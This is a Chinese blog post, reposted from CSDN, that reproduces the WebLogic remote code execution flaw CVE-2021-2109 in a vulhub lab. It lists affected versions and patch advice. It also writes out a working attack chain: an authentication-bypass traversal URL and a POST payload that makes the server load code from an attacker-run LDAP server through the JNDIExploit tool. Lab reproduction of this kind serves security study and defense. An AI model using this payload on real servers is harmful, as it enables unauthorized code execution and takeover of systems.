小言_互联网的博客

(CVE-2021-2109 )Weblogic Server远程代码执行漏洞复现

243人阅读  评论(0)

0x00简介

WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。

0x01漏洞概述

该漏洞为Weblogic的远程代码执行漏洞。漏洞主要由JNDI注入,导致攻击者可利用此漏洞远程代码执行。

0x02影响版本

Weblogic Server 10.3.6.0.0

Weblogic Server 12.1.3.0.0

Weblogic Server 12.2.1.3.0

Weblogic Server 12.2.1.4.0

Weblogic Server 14.1.1.0.0

0x03环境搭建

1. 本次漏洞环境使用vulhub中的docker搭建,下载地址

https://github.com/vulhub/vulhub

2. 然后使用vulhub中CVE-2020-14882漏洞为本次漏洞复现环境

cd vulhub-master/weblogic/CVE-2020-14882/

docker-compose up -d

4.在浏览器访问http://your-ip:7001/console,出现以下页面搭建成功

0x04漏洞复现

1.下载LDAP,并启动LDAP,下载地址:

https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11

注:运行ldap需要java1.8环境

java -jar JNDIExploit-v1.11.jar -i 172.16.1.147

3. 使用未授权漏洞配合利用,在首页url处输入以下链接,并进行抓包并发送到重放模块

/console/css/%252e%252e%252f/consolejndi.portal

4. 将get改为post,并构造以下数据包。注:172.16.1;147有个点为分号

_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://172.16.1;147:1389/Basic/WeblogicEcho;AdminServer%22)

0x06修复建议

1、由于是通过JNDI注入进行远程命令执行,所以受到JDK版本的影响,建议升级Weblogic Server运行环境的JDK版本

2、更新最新补丁,参考Oracle官网发布的补丁:

https://www.oracle.com/security-alerts/cpujan2021.html

参考链接:

https://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw


转载:https://blog.csdn.net/m0_48520508/article/details/113570548
查看评论
* 以上用户言论只代表其个人观点,不代表本网站的观点或立场